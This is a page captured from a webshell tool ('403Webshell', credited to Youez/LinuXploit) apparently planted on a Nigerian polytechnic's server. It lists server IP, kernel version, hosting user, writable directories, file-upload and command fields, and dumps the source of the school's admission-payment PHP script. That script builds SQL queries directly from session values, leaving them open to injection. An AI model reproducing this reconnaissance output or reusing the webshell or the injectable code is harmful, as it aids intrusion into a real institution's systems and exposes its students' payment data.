403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.131.126
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/ace_entranceForm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/ace_entranceForm/remitaFormPayment_NewC.php
<?php
session_start();
echo $transID=$_SESSION['matNo'];
//die();
$surname=$_SESSION['surname'];
$otherNames=$_SESSION['otherNames'];
$_SESSION['names']=$surname.' '.$otherNames;
 $dept=$_SESSION['dept'];
$gsm=$_SESSION['gsm'];
$email=$_SESSION['email'];
$formType=$_SESSION['formType'];
require_once('../connect.php');
  $_SESSION['ptype']=$formType;
 $_SESSION['ptype2']=$formType;
//die();
$_SESSION['medium'] = 'ATM Card';
$db=db_connect();
// echo $transID.'<br>';
// echo $formType;
 $f="select * from ace_remitaorderform where `regNo`='$transID' and paymentType='$formType' and transApproved='True'";
$query_k=$db->query("select * from ace_remitaorderform where `regNo`='$transID' and paymentType='$formType' and transApproved='True'");
$f_query=$query_k->fetch(PDO::FETCH_BOTH);
$f_query['transApproved'];
$q_num=$query_k->rowCount();
//die();
if ($q_num>0){
    echo 'Payment Has Been Made, Proceed to Registration, <a href="apply.php">Click Here to Continue</a>';
    // header_remove();
    //header('location:login.php');

}else {
    $_SESSION['f_charges']=$f_charges=1050.00;
    if  ($formType =='aceForm') {
        $_SESSION['f_amount']=$f_amount = 10000.00;
        $_SESSION['amount']=$amount = 11050.00;
    }else{
        $_SESSION['f_amount']= $f_amount=0.00;
        $_SESSION['amount']=$amount =0.00;
    }
}
//echo $amount;
//die();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="../Templates/mainTemp.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
    <!-- Bootstrap Core CSS -->
    <link href="../bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- MetisMenu CSS -->
    <link href="../bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link href="../dist/css/sb-admin-2.css" rel="stylesheet">

    <!-- Custom Fonts -->
    <link href="../bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>

    <![endif]-->
    <script src="../../chat/js/libs/jquery-1.7.2.min.js"></script>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <!-- InstanceBeginEditable name="doctitle" -->
    <title>Federal Poly Ede | Admission Form</title>
    <!-- InstanceEndEditable -->
    <!-- InstanceBeginEditable name="head" -->
    <script src="../SpryAssets/SpryTabbedPanels.js" type="text/javascript"></script>
    <link href="../SpryAssets/SpryTabbedPanels.css" rel="stylesheet" type="text/css" />

    <!-- InstanceEndEditable -->
    <style type="text/css">
        body {
            background-color: #CFD1DE;
            background-image: url(../images/logo2fade.png);
        }
    </style>

    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/bootstrap-dark.min.css">
</head>
<a class="navbar-brand col-lg-10 col-lg-offset-0" href="../index.php"><img src="../images/ace_logoOriginal_color.png"></a>
<body background="../images/logo2fade.png">

<table width="90%" align="center" cellpadding="3" cellspacing="5" >
    <tr>
        <td>

        </td
        <br>
        <td>h</td>

    </tr>
    <tr></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
</table><br>

<div id="wrapper">
    <table width="100%" align="center" cellpadding="3" cellspacing="5">
        <tr>
            <td><fieldset>

                    <form id="form1" name="form1" method="post" action="../ace_admin_student/webkonnect.php" role="form">
                        <fieldset>
                            <legend>
                                <div class="row">
                                    <div class="col-lg-1"></div>
                                    <div class="col-lg-9">
                                        <div class="panel panel-default">
                                            <div class="panel-heading">
                                                Transaction ID - (<?php echo $transID; ?>)
                                            </div>
                                            <div class="panel-body">

                                                <div class="row">
                                                    <div class="col-lg-12">
                                                        <form role="form">

                                                                <table width="100%" align="center">
                                                                    <tbody>
                                                                    <tr>
                                                                        <td width="60%">Payer Name:</td>
                                                                        <td><input name="payerName" type="text"
                                                                                   value="<?php echo $_SESSION['names'];
                                                                                   $_SESSION['ptype'] = $formType;
                                                                                   ?>" size="45" readonly="readonly"
                                                                                   class="form-control"></td>
                                                                    </tr>
                                                                    <tr>
                                                                        <td width="60%">Payer Email: <font
                                                                                color="red">*</font></td>
                                                                        <td><input name="payerEmail" required value=""
                                                                                   type="email" class="form-control">
                                                                        </td>
                                                                    </tr>
                                                                    <tr>
                                                                        <td>Payer Phone:</td>
                                                                        <td><input name="payerPhone" value=""
                                                                                   type="text" class="form-control">
                                                                            <input type="hidden" name="pt" value="aceForm" />
                                                                        </td>
                                                                    </tr>
                                                                    <tr>
                                                                        <td width="200">Amount: <font
                                                                                color="red">*</font></td>
                                                                        <td><input name="amt_1" type="text"
                                                                                   class="form-control" required
                                                                                   value="<?php echo $f_amount;?>" readonly="readonly">
                                                                        </td>
                                                                    </tr>
                                                                    <tr>
                                                                        <td width="200">Charges: <font
                                                                                color="red">*</font></td>
                                                                        <td><input name="amt_c" type="text"
                                                                                   class="form-control" required
                                                                                   value="<?php echo $f_charges;?>" readonly="readonly">
                                                                        </td>
                                                                    </tr>
                                                                    <tr>
                                                                        <td width="200">Total Amount: <font
                                                                                color="red">*</font></td>
                                                                        <td><input name="amt" type="text"
                                                                                   class="form-control" required
                                                                                   value="<?php echo $amount;?>" readonly="readonly">
                                                                        </td>
                                                                    </tr>
                                                                    <tr>
                                                                        <td width="200"></td>
                                                                        <td><p></p><input type="submit" name="" value="Pay with Account"
                                                                                          class="btn btn-primary form-control">
                                                                            <!--                                                                            <img src="../images/remitaLogo.jpg" alt="" width="418" height="90"/></td>-->
                                                                    </tr>
                                                                    </tbody>
                                                                </table>
                                                                <div> <a href="paymentHistoryForm.php"> Click to check Payment History </a></div>

                                                        </form>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </legend>
                        </fieldset>
                    </form>
                </fieldset>
            </td>
        </tr>
    </table>

    <?php
    include('footMain.php');
    ?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit